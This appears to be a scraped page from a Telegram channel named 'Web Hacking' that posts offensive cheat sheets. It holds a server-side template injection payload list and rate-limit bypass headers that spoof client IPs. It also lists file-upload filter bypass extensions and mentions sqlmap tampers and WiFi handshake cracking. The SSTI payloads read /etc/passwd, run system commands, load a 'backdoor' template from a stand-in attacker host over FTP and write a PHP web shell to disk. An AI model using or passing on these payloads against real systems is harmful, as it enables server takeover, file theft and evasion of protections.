Web Hacking
2.12K subscribers
52 photos
6 files
37 links
Download Telegram
Google Dorks to Find Sensitive data or dir
๐Ÿ”ฅ8๐Ÿ‘2โค1
SSTI (Server Side Template Injection)

Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}

PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}

Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}
๐Ÿ‘5โค3๐Ÿ‘Œ1
Rate Limit Bypass Techniques:

Adding HTTP Headers to Spoof IP and Evade Detection:

X-Forwarded-For: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Host: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
๐Ÿ‘5โค4
File Upload Bypass -

Blacklisting Bypass
PHP โ†’ .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
ASP โ†’ .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp โ†’ .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion โ†’ .cfm, .cfml, .cfc, .dbm
Perl โ†’ .pl, .cgi
Using random capitalization โ†’ .pHp, .pHP5, .PhAr

Whitelisting Bypass
file.png.php
file.png.Php5
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg
๐Ÿ‘11๐Ÿคฉ3๐Ÿ‘Œ3โค1
Awesome Sqlmap Tampers-1.pdf
11.8 MB
Awesome Sqlmap Tampers-1.pdf
โค2๐Ÿ‘1๐Ÿ‘1
Forwarded from WiFi Security
Wifi Penetration Testing : WPA2/WPA3 Handshake Capture & Cracking Workflow
๐Ÿ‘Œ2โค1
Sqlmap
Crackmapexec (CME)

๐Ÿ‡บ๐Ÿ‡ฒ Please share this post with friends who you think might be interested if you liked it.


๐Ÿ‡ช๐Ÿ‡ธ Si te gustรณ esta publicaciรณn, compรกrtela con tus amigos que creas que puedan estar interesados.


๐Ÿ‡ท๐Ÿ‡บ ะ•ัะปะธ ะฒะฐะผ ะฟะพะฝั€ะฐะฒะธะปะฐััŒ ัั‚ะฐ ะฟัƒะฑะปะธะบะฐั†ะธั, ะฟะพะดะตะปะธั‚ะตััŒ ะตัŽ ั ะดั€ัƒะทัŒัะผะธ, ะบะพั‚ะพั€ั‹ะผ ัั‚ะพ ะผะพะถะตั‚ ะฑั‹ั‚ัŒ ะธะฝั‚ะตั€ะตัะฝะพ.
๐Ÿ”ฅ1